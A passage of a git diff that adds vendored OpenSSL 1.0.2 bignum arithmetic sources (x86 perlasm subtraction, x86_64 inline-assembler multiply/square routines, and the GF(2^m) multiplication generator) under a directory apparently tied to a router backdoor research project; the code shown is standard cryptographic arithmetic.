+	$tmp2="edx";
+	$num="ebp";
+
+	&mov($r,&wparam(0));	# get r
+	 &mov($a,&wparam(1));	# get a
+	&mov($b,&wparam(2));	# get b
+	 &mov($num,&wparam(3));	# get num
+	&xor($c,$c);		# clear carry
+	 &and($num,0xfffffff8);	# num / 8
+
+	&jz(&label("aw_finish"));
+
+	&set_label("aw_loop",0);
+	for ($i=0; $i<8; $i++)
+		{
+		&comment("Round $i");
+
+		&mov($tmp1,&DWP($i*4,$a,"",0)); 	# *a
+		 &mov($tmp2,&DWP($i*4,$b,"",0)); 	# *b
+		&sub($tmp1,$c);
+		 &mov($c,0);
+		&adc($c,$c);
+		 &sub($tmp1,$tmp2);
+		&adc($c,0);
+		 &mov(&DWP($i*4,$r,"",0),$tmp1); 	# *r
+		}
+
+	&comment("");
+	&add($a,32);
+	 &add($b,32);
+	&add($r,32);
+	 &sub($num,8);
+	&jnz(&label("aw_loop"));
+
+	&set_label("aw_finish",0);
+	&mov($num,&wparam(3));	# get num
+	&and($num,7);
+	 &jz(&label("aw_end"));
+
+	for ($i=0; $i<7; $i++)
+		{
+		&comment("Tail Round $i");
+		&mov($tmp1,&DWP($i*4,$a,"",0));	# *a
+		 &mov($tmp2,&DWP($i*4,$b,"",0));# *b
+		&sub($tmp1,$c);
+		 &mov($c,0);
+		&adc($c,$c);
+		 &sub($tmp1,$tmp2);
+		&adc($c,0);
+		 &dec($num) if ($i != 6);
+		&mov(&DWP($i*4,$r,"",0),$tmp1);	# *a
+		 &jz(&label("aw_end")) if ($i != 6);
+		}
+	&set_label("aw_end",0);
+
+#	&mov("eax",$c);		# $c is "eax"
+
+	&function_end($name);
+	}
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86_64-gcc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86_64-gcc.c
new file mode 100644
index 0000000..d548886
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86_64-gcc.c
@@ -0,0 +1,638 @@
+#include "../bn_lcl.h"
+#if !(defined(__GNUC__) && __GNUC__>=2)
+# include "../bn_asm.c"         /* kind of dirty hack for Sun Studio */
+#else
+/*-
+ * x86_64 BIGNUM accelerator version 0.1, December 2002.
+ *
+ * Implemented by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+ * project.
+ *
+ * Rights for redistribution and usage in source and binary forms are
+ * granted according to the OpenSSL license. Warranty of any kind is
+ * disclaimed.
+ *
+ * Q. Version 0.1? It doesn't sound like Andy, he used to assign real
+ *    versions, like 1.0...
+ * A. Well, that's because this code is basically a quick-n-dirty
+ *    proof-of-concept hack. As you can see it's implemented with
+ *    inline assembler, which means that you're bound to GCC and that
+ *    there might be enough room for further improvement.
+ *
+ * Q. Why inline assembler?
+ * A. x86_64 features own ABI which I'm not familiar with. This is
+ *    why I decided to let the compiler take care of subroutine
+ *    prologue/epilogue as well as register allocation. For reference.
+ *    Win64 implements different ABI for AMD64, different from Linux.
+ *
+ * Q. How much faster does it get?
+ * A. 'apps/openssl speed rsa dsa' output with no-asm:
+ *
+ *                        sign    verify    sign/s verify/s
+ *      rsa  512 bits   0.0006s   0.0001s   1683.8  18456.2
+ *      rsa 1024 bits   0.0028s   0.0002s    356.0   6407.0
+ *      rsa 2048 bits   0.0172s   0.0005s     58.0   1957.8
+ *      rsa 4096 bits   0.1155s   0.0018s      8.7    555.6
+ *                        sign    verify    sign/s verify/s
+ *      dsa  512 bits   0.0005s   0.0006s   2100.8   1768.3
+ *      dsa 1024 bits   0.0014s   0.0018s    692.3    559.2
+ *      dsa 2048 bits   0.0049s   0.0061s    204.7    165.0
+ *
+ *    'apps/openssl speed rsa dsa' output with this module:
+ *
+ *                        sign    verify    sign/s verify/s
+ *      rsa  512 bits   0.0004s   0.0000s   2767.1  33297.9
+ *      rsa 1024 bits   0.0012s   0.0001s    867.4  14674.7
+ *      rsa 2048 bits   0.0061s   0.0002s    164.0   5270.0
+ *      rsa 4096 bits   0.0384s   0.0006s     26.1   1650.8
+ *                        sign    verify    sign/s verify/s
+ *      dsa  512 bits   0.0002s   0.0003s   4442.2   3786.3
+ *      dsa 1024 bits   0.0005s   0.0007s   1835.1   1497.4
+ *      dsa 2048 bits   0.0016s   0.0020s    620.4    504.6
+ *
+ *    For the reference. IA-32 assembler implementation performs
+ *    very much like 64-bit code compiled with no-asm on the same
+ *    machine.
+ */
+
+# if defined(_WIN64) || !defined(__LP64__)
+#  define BN_ULONG unsigned long long
+# else
+#  define BN_ULONG unsigned long
+# endif
+
+# undef mul
+# undef mul_add
+
+/*-
+ * "m"(a), "+m"(r)      is the way to favor DirectPath µ-code;
+ * "g"(0)               let the compiler to decide where does it
+ *                      want to keep the value of zero;
+ */
+# define mul_add(r,a,word,carry) do {   \
+        register BN_ULONG high,low;     \
+        asm ("mulq %3"                  \
+                : "=a"(low),"=d"(high)  \
+                : "a"(word),"m"(a)      \
+                : "cc");                \
+        asm ("addq %2,%0; adcq %3,%1"   \
+                : "+r"(carry),"+d"(high)\
+                : "a"(low),"g"(0)       \
+                : "cc");                \
+        asm ("addq %2,%0; adcq %3,%1"   \
+                : "+m"(r),"+d"(high)    \
+                : "r"(carry),"g"(0)     \
+                : "cc");                \
+        carry=high;                     \
+        } while (0)
+
+# define mul(r,a,word,carry) do {       \
+        register BN_ULONG high,low;     \
+        asm ("mulq %3"                  \
+                : "=a"(low),"=d"(high)  \
+                : "a"(word),"g"(a)      \
+                : "cc");                \
+        asm ("addq %2,%0; adcq %3,%1"   \
+                : "+r"(carry),"+d"(high)\
+                : "a"(low),"g"(0)       \
+                : "cc");                \
+        (r)=carry, carry=high;          \
+        } while (0)
+# undef sqr
+# define sqr(r0,r1,a)                   \
+        asm ("mulq %2"                  \
+                : "=a"(r0),"=d"(r1)     \
+                : "a"(a)                \
+                : "cc");
+
+BN_ULONG bn_mul_add_words(BN_ULONG *rp, const BN_ULONG *ap, int num,
+                          BN_ULONG w)
+{
+    BN_ULONG c1 = 0;
+
+    if (num <= 0)
+        return (c1);
+
+    while (num & ~3) {
+        mul_add(rp[0], ap[0], w, c1);
+        mul_add(rp[1], ap[1], w, c1);
+        mul_add(rp[2], ap[2], w, c1);
+        mul_add(rp[3], ap[3], w, c1);
+        ap += 4;
+        rp += 4;
+        num -= 4;
+    }
+    if (num) {
+        mul_add(rp[0], ap[0], w, c1);
+        if (--num == 0)
+            return c1;
+        mul_add(rp[1], ap[1], w, c1);
+        if (--num == 0)
+            return c1;
+        mul_add(rp[2], ap[2], w, c1);
+        return c1;
+    }
+
+    return (c1);
+}
+
+BN_ULONG bn_mul_words(BN_ULONG *rp, const BN_ULONG *ap, int num, BN_ULONG w)
+{
+    BN_ULONG c1 = 0;
+
+    if (num <= 0)
+        return (c1);
+
+    while (num & ~3) {
+        mul(rp[0], ap[0], w, c1);
+        mul(rp[1], ap[1], w, c1);
+        mul(rp[2], ap[2], w, c1);
+        mul(rp[3], ap[3], w, c1);
+        ap += 4;
+        rp += 4;
+        num -= 4;
+    }
+    if (num) {
+        mul(rp[0], ap[0], w, c1);
+        if (--num == 0)
+            return c1;
+        mul(rp[1], ap[1], w, c1);
+        if (--num == 0)
+            return c1;
+        mul(rp[2], ap[2], w, c1);
+    }
+    return (c1);
+}
+
+void bn_sqr_words(BN_ULONG *r, const BN_ULONG *a, int n)
+{
+    if (n <= 0)
+        return;
+
+    while (n & ~3) {
+        sqr(r[0], r[1], a[0]);
+        sqr(r[2], r[3], a[1]);
+        sqr(r[4], r[5], a[2]);
+        sqr(r[6], r[7], a[3]);
+        a += 4;
+        r += 8;
+        n -= 4;
+    }
+    if (n) {
+        sqr(r[0], r[1], a[0]);
+        if (--n == 0)
+            return;
+        sqr(r[2], r[3], a[1]);
+        if (--n == 0)
+            return;
+        sqr(r[4], r[5], a[2]);
+    }
+}
+
+BN_ULONG bn_div_words(BN_ULONG h, BN_ULONG l, BN_ULONG d)
+{
+    BN_ULONG ret, waste;
+
+ asm("divq      %4":"=a"(ret), "=d"(waste)
+ :     "a"(l), "d"(h), "g"(d)
+ :     "cc");
+
+    return ret;
+}
+
+BN_ULONG bn_add_words(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,
+                      int n)
+{
+    BN_ULONG ret;
+    size_t i = 0;
+
+    if (n <= 0)
+        return 0;
+
+    asm volatile ("       subq    %0,%0           \n" /* clear carry */
+                  "       jmp     1f              \n"
+                  ".p2align 4                     \n"
+                  "1:     movq    (%4,%2,8),%0    \n"
+                  "       adcq    (%5,%2,8),%0    \n"
+                  "       movq    %0,(%3,%2,8)    \n"
+                  "       lea     1(%2),%2        \n"
+                  "       loop    1b              \n"
+                  "       sbbq    %0,%0           \n":"=&r" (ret), "+c"(n),
+                  "+r"(i)
+                  :"r"(rp), "r"(ap), "r"(bp)
+                  :"cc", "memory");
+
+    return ret & 1;
+}
+
+# ifndef SIMICS
+BN_ULONG bn_sub_words(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,
+                      int n)
+{
+    BN_ULONG ret;
+    size_t i = 0;
+
+    if (n <= 0)
+        return 0;
+
+    asm volatile ("       subq    %0,%0           \n" /* clear borrow */
+                  "       jmp     1f              \n"
+                  ".p2align 4                     \n"
+                  "1:     movq    (%4,%2,8),%0    \n"
+                  "       sbbq    (%5,%2,8),%0    \n"
+                  "       movq    %0,(%3,%2,8)    \n"
+                  "       lea     1(%2),%2        \n"
+                  "       loop    1b              \n"
+                  "       sbbq    %0,%0           \n":"=&r" (ret), "+c"(n),
+                  "+r"(i)
+                  :"r"(rp), "r"(ap), "r"(bp)
+                  :"cc", "memory");
+
+    return ret & 1;
+}
+# else
+/* Simics 1.4<7 has buggy sbbq:-( */
+#  define BN_MASK2 0xffffffffffffffffL
+BN_ULONG bn_sub_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
+{
+    BN_ULONG t1, t2;
+    int c = 0;
+
+    if (n <= 0)
+        return ((BN_ULONG)0);
+
+    for (;;) {
+        t1 = a[0];
+        t2 = b[0];
+        r[0] = (t1 - t2 - c) & BN_MASK2;
+        if (t1 != t2)
+            c = (t1 < t2);
+        if (--n <= 0)
+            break;
+
+        t1 = a[1];
+        t2 = b[1];
+        r[1] = (t1 - t2 - c) & BN_MASK2;
+        if (t1 != t2)
+            c = (t1 < t2);
+        if (--n <= 0)
+            break;
+
+        t1 = a[2];
+        t2 = b[2];
+        r[2] = (t1 - t2 - c) & BN_MASK2;
+        if (t1 != t2)
+            c = (t1 < t2);
+        if (--n <= 0)
+            break;
+
+        t1 = a[3];
+        t2 = b[3];
+        r[3] = (t1 - t2 - c) & BN_MASK2;
+        if (t1 != t2)
+            c = (t1 < t2);
+        if (--n <= 0)
+            break;
+
+        a += 4;
+        b += 4;
+        r += 4;
+    }
+    return (c);
+}
+# endif
+
+/* mul_add_c(a,b,c0,c1,c2)  -- c+=a*b for three word number c=(c2,c1,c0) */
+/* mul_add_c2(a,b,c0,c1,c2) -- c+=2*a*b for three word number c=(c2,c1,c0) */
+/* sqr_add_c(a,i,c0,c1,c2)  -- c+=a[i]^2 for three word number c=(c2,c1,c0) */
+/*
+ * sqr_add_c2(a,i,c0,c1,c2) -- c+=2*a[i]*a[j] for three word number
+ * c=(c2,c1,c0)
+ */
+
+/*
+ * Keep in mind that carrying into high part of multiplication result
+ * can not overflow, because it cannot be all-ones.
+ */
+# if 0
+/* original macros are kept for reference purposes */
+#  define mul_add_c(a,b,c0,c1,c2)       do {    \
+        BN_ULONG ta = (a), tb = (b);            \
+        BN_ULONG lo, hi;                        \
+        BN_UMULT_LOHI(lo,hi,ta,tb);             \
+        c0 += lo; hi += (c0<lo)?1:0;            \
+        c1 += hi; c2 += (c1<hi)?1:0;            \
+        } while(0)
+
+#  define mul_add_c2(a,b,c0,c1,c2)      do {    \
+        BN_ULONG ta = (a), tb = (b);            \
+        BN_ULONG lo, hi, tt;                    \
+        BN_UMULT_LOHI(lo,hi,ta,tb);             \
+        c0 += lo; tt = hi+((c0<lo)?1:0);        \
+        c1 += tt; c2 += (c1<tt)?1:0;            \
+        c0 += lo; hi += (c0<lo)?1:0;            \
+        c1 += hi; c2 += (c1<hi)?1:0;            \
+        } while(0)
+
+#  define sqr_add_c(a,i,c0,c1,c2)       do {    \
+        BN_ULONG ta = (a)[i];                   \
+        BN_ULONG lo, hi;                        \
+        BN_UMULT_LOHI(lo,hi,ta,ta);             \
+        c0 += lo; hi += (c0<lo)?1:0;            \
+        c1 += hi; c2 += (c1<hi)?1:0;            \
+        } while(0)
+# else
+#  define mul_add_c(a,b,c0,c1,c2) do {  \
+        BN_ULONG t1,t2;                 \
+        asm ("mulq %3"                  \
+                : "=a"(t1),"=d"(t2)     \
+                : "a"(a),"m"(b)         \
+                : "cc");                \
+        asm ("addq %3,%0; adcq %4,%1; adcq %5,%2"       \
+                : "+r"(c0),"+r"(c1),"+r"(c2)            \
+                : "r"(t1),"r"(t2),"g"(0)                \
+                : "cc");                                \
+        } while (0)
+
+#  define sqr_add_c(a,i,c0,c1,c2) do {  \
+        BN_ULONG t1,t2;                 \
+        asm ("mulq %2"                  \
+                : "=a"(t1),"=d"(t2)     \
+                : "a"(a[i])             \
+                : "cc");                \
+        asm ("addq %3,%0; adcq %4,%1; adcq %5,%2"       \
+                : "+r"(c0),"+r"(c1),"+r"(c2)            \
+                : "r"(t1),"r"(t2),"g"(0)                \
+                : "cc");                                \
+        } while (0)
+
+#  define mul_add_c2(a,b,c0,c1,c2) do { \
+        BN_ULONG t1,t2;                 \
+        asm ("mulq %3"                  \
+                : "=a"(t1),"=d"(t2)     \
+                : "a"(a),"m"(b)         \
+                : "cc");                \
+        asm ("addq %3,%0; adcq %4,%1; adcq %5,%2"       \
+                : "+r"(c0),"+r"(c1),"+r"(c2)            \
+                : "r"(t1),"r"(t2),"g"(0)                \
+                : "cc");                                \
+        asm ("addq %3,%0; adcq %4,%1; adcq %5,%2"       \
+                : "+r"(c0),"+r"(c1),"+r"(c2)            \
+                : "r"(t1),"r"(t2),"g"(0)                \
+                : "cc");                                \
+        } while (0)
+# endif
+
+# define sqr_add_c2(a,i,j,c0,c1,c2)      \
+        mul_add_c2((a)[i],(a)[j],c0,c1,c2)
+
+void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
+{
+    BN_ULONG c1, c2, c3;
+
+    c1 = 0;
+    c2 = 0;
+    c3 = 0;
+    mul_add_c(a[0], b[0], c1, c2, c3);
+    r[0] = c1;
+    c1 = 0;
+    mul_add_c(a[0], b[1], c2, c3, c1);
+    mul_add_c(a[1], b[0], c2, c3, c1);
+    r[1] = c2;
+    c2 = 0;
+    mul_add_c(a[2], b[0], c3, c1, c2);
+    mul_add_c(a[1], b[1], c3, c1, c2);
+    mul_add_c(a[0], b[2], c3, c1, c2);
+    r[2] = c3;
+    c3 = 0;
+    mul_add_c(a[0], b[3], c1, c2, c3);
+    mul_add_c(a[1], b[2], c1, c2, c3);
+    mul_add_c(a[2], b[1], c1, c2, c3);
+    mul_add_c(a[3], b[0], c1, c2, c3);
+    r[3] = c1;
+    c1 = 0;
+    mul_add_c(a[4], b[0], c2, c3, c1);
+    mul_add_c(a[3], b[1], c2, c3, c1);
+    mul_add_c(a[2], b[2], c2, c3, c1);
+    mul_add_c(a[1], b[3], c2, c3, c1);
+    mul_add_c(a[0], b[4], c2, c3, c1);
+    r[4] = c2;
+    c2 = 0;
+    mul_add_c(a[0], b[5], c3, c1, c2);
+    mul_add_c(a[1], b[4], c3, c1, c2);
+    mul_add_c(a[2], b[3], c3, c1, c2);
+    mul_add_c(a[3], b[2], c3, c1, c2);
+    mul_add_c(a[4], b[1], c3, c1, c2);
+    mul_add_c(a[5], b[0], c3, c1, c2);
+    r[5] = c3;
+    c3 = 0;
+    mul_add_c(a[6], b[0], c1, c2, c3);
+    mul_add_c(a[5], b[1], c1, c2, c3);
+    mul_add_c(a[4], b[2], c1, c2, c3);
+    mul_add_c(a[3], b[3], c1, c2, c3);
+    mul_add_c(a[2], b[4], c1, c2, c3);
+    mul_add_c(a[1], b[5], c1, c2, c3);
+    mul_add_c(a[0], b[6], c1, c2, c3);
+    r[6] = c1;
+    c1 = 0;
+    mul_add_c(a[0], b[7], c2, c3, c1);
+    mul_add_c(a[1], b[6], c2, c3, c1);
+    mul_add_c(a[2], b[5], c2, c3, c1);
+    mul_add_c(a[3], b[4], c2, c3, c1);
+    mul_add_c(a[4], b[3], c2, c3, c1);
+    mul_add_c(a[5], b[2], c2, c3, c1);
+    mul_add_c(a[6], b[1], c2, c3, c1);
+    mul_add_c(a[7], b[0], c2, c3, c1);
+    r[7] = c2;
+    c2 = 0;
+    mul_add_c(a[7], b[1], c3, c1, c2);
+    mul_add_c(a[6], b[2], c3, c1, c2);
+    mul_add_c(a[5], b[3], c3, c1, c2);
+    mul_add_c(a[4], b[4], c3, c1, c2);
+    mul_add_c(a[3], b[5], c3, c1, c2);
+    mul_add_c(a[2], b[6], c3, c1, c2);
+    mul_add_c(a[1], b[7], c3, c1, c2);
+    r[8] = c3;
+    c3 = 0;
+    mul_add_c(a[2], b[7], c1, c2, c3);
+    mul_add_c(a[3], b[6], c1, c2, c3);
+    mul_add_c(a[4], b[5], c1, c2, c3);
+    mul_add_c(a[5], b[4], c1, c2, c3);
+    mul_add_c(a[6], b[3], c1, c2, c3);
+    mul_add_c(a[7], b[2], c1, c2, c3);
+    r[9] = c1;
+    c1 = 0;
+    mul_add_c(a[7], b[3], c2, c3, c1);
+    mul_add_c(a[6], b[4], c2, c3, c1);
+    mul_add_c(a[5], b[5], c2, c3, c1);
+    mul_add_c(a[4], b[6], c2, c3, c1);
+    mul_add_c(a[3], b[7], c2, c3, c1);
+    r[10] = c2;
+    c2 = 0;
+    mul_add_c(a[4], b[7], c3, c1, c2);
+    mul_add_c(a[5], b[6], c3, c1, c2);
+    mul_add_c(a[6], b[5], c3, c1, c2);
+    mul_add_c(a[7], b[4], c3, c1, c2);
+    r[11] = c3;
+    c3 = 0;
+    mul_add_c(a[7], b[5], c1, c2, c3);
+    mul_add_c(a[6], b[6], c1, c2, c3);
+    mul_add_c(a[5], b[7], c1, c2, c3);
+    r[12] = c1;
+    c1 = 0;
+    mul_add_c(a[6], b[7], c2, c3, c1);
+    mul_add_c(a[7], b[6], c2, c3, c1);
+    r[13] = c2;
+    c2 = 0;
+    mul_add_c(a[7], b[7], c3, c1, c2);
+    r[14] = c3;
+    r[15] = c1;
+}
+
+void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
+{
+    BN_ULONG c1, c2, c3;
+
+    c1 = 0;
+    c2 = 0;
+    c3 = 0;
+    mul_add_c(a[0], b[0], c1, c2, c3);
+    r[0] = c1;
+    c1 = 0;
+    mul_add_c(a[0], b[1], c2, c3, c1);
+    mul_add_c(a[1], b[0], c2, c3, c1);
+    r[1] = c2;
+    c2 = 0;
+    mul_add_c(a[2], b[0], c3, c1, c2);
+    mul_add_c(a[1], b[1], c3, c1, c2);
+    mul_add_c(a[0], b[2], c3, c1, c2);
+    r[2] = c3;
+    c3 = 0;
+    mul_add_c(a[0], b[3], c1, c2, c3);
+    mul_add_c(a[1], b[2], c1, c2, c3);
+    mul_add_c(a[2], b[1], c1, c2, c3);
+    mul_add_c(a[3], b[0], c1, c2, c3);
+    r[3] = c1;
+    c1 = 0;
+    mul_add_c(a[3], b[1], c2, c3, c1);
+    mul_add_c(a[2], b[2], c2, c3, c1);
+    mul_add_c(a[1], b[3], c2, c3, c1);
+    r[4] = c2;
+    c2 = 0;
+    mul_add_c(a[2], b[3], c3, c1, c2);
+    mul_add_c(a[3], b[2], c3, c1, c2);
+    r[5] = c3;
+    c3 = 0;
+    mul_add_c(a[3], b[3], c1, c2, c3);
+    r[6] = c1;
+    r[7] = c2;
+}
+
+void bn_sqr_comba8(BN_ULONG *r, const BN_ULONG *a)
+{
+    BN_ULONG c1, c2, c3;
+
+    c1 = 0;
+    c2 = 0;
+    c3 = 0;
+    sqr_add_c(a, 0, c1, c2, c3);
+    r[0] = c1;
+    c1 = 0;
+    sqr_add_c2(a, 1, 0, c2, c3, c1);
+    r[1] = c2;
+    c2 = 0;
+    sqr_add_c(a, 1, c3, c1, c2);
+    sqr_add_c2(a, 2, 0, c3, c1, c2);
+    r[2] = c3;
+    c3 = 0;
+    sqr_add_c2(a, 3, 0, c1, c2, c3);
+    sqr_add_c2(a, 2, 1, c1, c2, c3);
+    r[3] = c1;
+    c1 = 0;
+    sqr_add_c(a, 2, c2, c3, c1);
+    sqr_add_c2(a, 3, 1, c2, c3, c1);
+    sqr_add_c2(a, 4, 0, c2, c3, c1);
+    r[4] = c2;
+    c2 = 0;
+    sqr_add_c2(a, 5, 0, c3, c1, c2);
+    sqr_add_c2(a, 4, 1, c3, c1, c2);
+    sqr_add_c2(a, 3, 2, c3, c1, c2);
+    r[5] = c3;
+    c3 = 0;
+    sqr_add_c(a, 3, c1, c2, c3);
+    sqr_add_c2(a, 4, 2, c1, c2, c3);
+    sqr_add_c2(a, 5, 1, c1, c2, c3);
+    sqr_add_c2(a, 6, 0, c1, c2, c3);
+    r[6] = c1;
+    c1 = 0;
+    sqr_add_c2(a, 7, 0, c2, c3, c1);
+    sqr_add_c2(a, 6, 1, c2, c3, c1);
+    sqr_add_c2(a, 5, 2, c2, c3, c1);
+    sqr_add_c2(a, 4, 3, c2, c3, c1);
+    r[7] = c2;
+    c2 = 0;
+    sqr_add_c(a, 4, c3, c1, c2);
+    sqr_add_c2(a, 5, 3, c3, c1, c2);
+    sqr_add_c2(a, 6, 2, c3, c1, c2);
+    sqr_add_c2(a, 7, 1, c3, c1, c2);
+    r[8] = c3;
+    c3 = 0;
+    sqr_add_c2(a, 7, 2, c1, c2, c3);
+    sqr_add_c2(a, 6, 3, c1, c2, c3);
+    sqr_add_c2(a, 5, 4, c1, c2, c3);
+    r[9] = c1;
+    c1 = 0;
+    sqr_add_c(a, 5, c2, c3, c1);
+    sqr_add_c2(a, 6, 4, c2, c3, c1);
+    sqr_add_c2(a, 7, 3, c2, c3, c1);
+    r[10] = c2;
+    c2 = 0;
+    sqr_add_c2(a, 7, 4, c3, c1, c2);
+    sqr_add_c2(a, 6, 5, c3, c1, c2);
+    r[11] = c3;
+    c3 = 0;
+    sqr_add_c(a, 6, c1, c2, c3);
+    sqr_add_c2(a, 7, 5, c1, c2, c3);
+    r[12] = c1;
+    c1 = 0;
+    sqr_add_c2(a, 7, 6, c2, c3, c1);
+    r[13] = c2;
+    c2 = 0;
+    sqr_add_c(a, 7, c3, c1, c2);
+    r[14] = c3;
+    r[15] = c1;
+}
+
+void bn_sqr_comba4(BN_ULONG *r, const BN_ULONG *a)
+{
+    BN_ULONG c1, c2, c3;
+
+    c1 = 0;
+    c2 = 0;
+    c3 = 0;
+    sqr_add_c(a, 0, c1, c2, c3);
+    r[0] = c1;
+    c1 = 0;
+    sqr_add_c2(a, 1, 0, c2, c3, c1);
+    r[1] = c2;
+    c2 = 0;
+    sqr_add_c(a, 1, c3, c1, c2);
+    sqr_add_c2(a, 2, 0, c3, c1, c2);
+    r[2] = c3;
+    c3 = 0;
+    sqr_add_c2(a, 3, 0, c1, c2, c3);
+    sqr_add_c2(a, 2, 1, c1, c2, c3);
+    r[3] = c1;
+    c1 = 0;
+    sqr_add_c(a, 2, c2, c3, c1);
+    sqr_add_c2(a, 3, 1, c2, c3, c1);
+    r[4] = c2;
+    c2 = 0;
+    sqr_add_c2(a, 3, 2, c3, c1, c2);
+    r[5] = c3;
+    c3 = 0;
+    sqr_add_c(a, 3, c1, c2, c3);
+    r[6] = c1;
+    r[7] = c2;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86_64-gf2m.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86_64-gf2m.pl
new file mode 100644
index 0000000..226c66c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86_64-gf2m.pl
@@ -0,0 +1,390 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# May 2011
+#
+# The module implements bn_GF2m_mul_2x2 polynomial multiplication used
+# in bn_gf2m.c. It's kind of low-hanging mechanical port from C for
+# the time being... Except that it has two code paths: code suitable
+# for any x86_64 CPU and PCLMULQDQ one suitable for Westmere and
+# later. Improvement varies from one benchmark and µ-arch to another.
+# Vanilla code path is at most 20% faster than compiler-generated code
+# [not very impressive], while PCLMULQDQ - whole 85%-160% better on
+# 163- and 571-bit ECDH benchmarks on Intel CPUs. Keep in mind that
+# these coefficients are not ones for bn_GF2m_mul_2x2 itself, as not
+# all CPU time is burnt in it...
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+($lo,$hi)=("%rax","%rdx");	$a=$lo;
+($i0,$i1)=("%rsi","%rdi");
+($t0,$t1)=("%rbx","%rcx");
+($b,$mask)=("%rbp","%r8");
+($a1,$a2,$a4,$a8,$a12,$a48)=map("%r$_",(9..15));
+($R,$Tx)=("%xmm0","%xmm1");
+
+$code.=<<___;
+.text
+
+.type	_mul_1x1,\@abi-omnipotent
+.align	16
+_mul_1x1:
+	sub	\$128+8,%rsp
+	mov	\$-1,$a1
+	lea	($a,$a),$i0
+	shr	\$3,$a1
+	lea	(,$a,4),$i1
+	and	$a,$a1			# a1=a&0x1fffffffffffffff
+	lea	(,$a,8),$a8
+	sar	\$63,$a			# broadcast 63rd bit
+	lea	($a1,$a1),$a2
+	sar	\$63,$i0		# broadcast 62nd bit
+	lea	(,$a1,4),$a4
+	and	$b,$a
+	sar	\$63,$i1		# boardcast 61st bit
+	mov	$a,$hi			# $a is $lo
+	shl	\$63,$lo
+	and	$b,$i0
+	shr	\$1,$hi
+	mov	$i0,$t1
+	shl	\$62,$i0
+	and	$b,$i1
+	shr	\$2,$t1
+	xor	$i0,$lo
+	mov	$i1,$t0
+	shl	\$61,$i1
+	xor	$t1,$hi
+	shr	\$3,$t0
+	xor	$i1,$lo
+	xor	$t0,$hi
+
+	mov	$a1,$a12
+	movq	\$0,0(%rsp)		# tab[0]=0
+	xor	$a2,$a12		# a1^a2
+	mov	$a1,8(%rsp)		# tab[1]=a1
+	 mov	$a4,$a48
+	mov	$a2,16(%rsp)		# tab[2]=a2
+	 xor	$a8,$a48		# a4^a8
+	mov	$a12,24(%rsp)		# tab[3]=a1^a2
+
+	xor	$a4,$a1
+	mov	$a4,32(%rsp)		# tab[4]=a4
+	xor	$a4,$a2
+	mov	$a1,40(%rsp)		# tab[5]=a1^a4
+	xor	$a4,$a12
+	mov	$a2,48(%rsp)		# tab[6]=a2^a4
+	 xor	$a48,$a1		# a1^a4^a4^a8=a1^a8
+	mov	$a12,56(%rsp)		# tab[7]=a1^a2^a4
+	 xor	$a48,$a2		# a2^a4^a4^a8=a1^a8
+
+	mov	$a8,64(%rsp)		# tab[8]=a8
+	xor	$a48,$a12		# a1^a2^a4^a4^a8=a1^a2^a8
+	mov	$a1,72(%rsp)		# tab[9]=a1^a8
+	 xor	$a4,$a1			# a1^a8^a4
+	mov	$a2,80(%rsp)		# tab[10]=a2^a8
+	 xor	$a4,$a2			# a2^a8^a4
+	mov	$a12,88(%rsp)		# tab[11]=a1^a2^a8
+
+	xor	$a4,$a12		# a1^a2^a8^a4
+	mov	$a48,96(%rsp)		# tab[12]=a4^a8
+	 mov	$mask,$i0
+	mov	$a1,104(%rsp)		# tab[13]=a1^a4^a8
+	 and	$b,$i0
+	mov	$a2,112(%rsp)		# tab[14]=a2^a4^a8
+	 shr	\$4,$b
+	mov	$a12,120(%rsp)		# tab[15]=a1^a2^a4^a8
+	 mov	$mask,$i1
+	 and	$b,$i1
+	 shr	\$4,$b
+
+	movq	(%rsp,$i0,8),$R		# half of calculations is done in SSE2
+	mov	$mask,$i0
+	and	$b,$i0
+	shr	\$4,$b
+___
+    for ($n=1;$n<8;$n++) {
+	$code.=<<___;
+	mov	(%rsp,$i1,8),$t1
+	mov	$mask,$i1
+	mov	$t1,$t0
+	shl	\$`8*$n-4`,$t1
+	and	$b,$i1
+	 movq	(%rsp,$i0,8),$Tx
+	shr	\$`64-(8*$n-4)`,$t0
+	xor	$t1,$lo
+	 pslldq	\$$n,$Tx
+	 mov	$mask,$i0
+	shr	\$4,$b
+	xor	$t0,$hi
+	 and	$b,$i0
+	 shr	\$4,$b
+	 pxor	$Tx,$R
+___
+    }
+$code.=<<___;
+	mov	(%rsp,$i1,8),$t1
+	mov	$t1,$t0
+	shl	\$`8*$n-4`,$t1
+	movq	$R,$i0
+	shr	\$`64-(8*$n-4)`,$t0
+	xor	$t1,$lo
+	psrldq	\$8,$R
+	xor	$t0,$hi
+	movq	$R,$i1
+	xor	$i0,$lo
+	xor	$i1,$hi
+
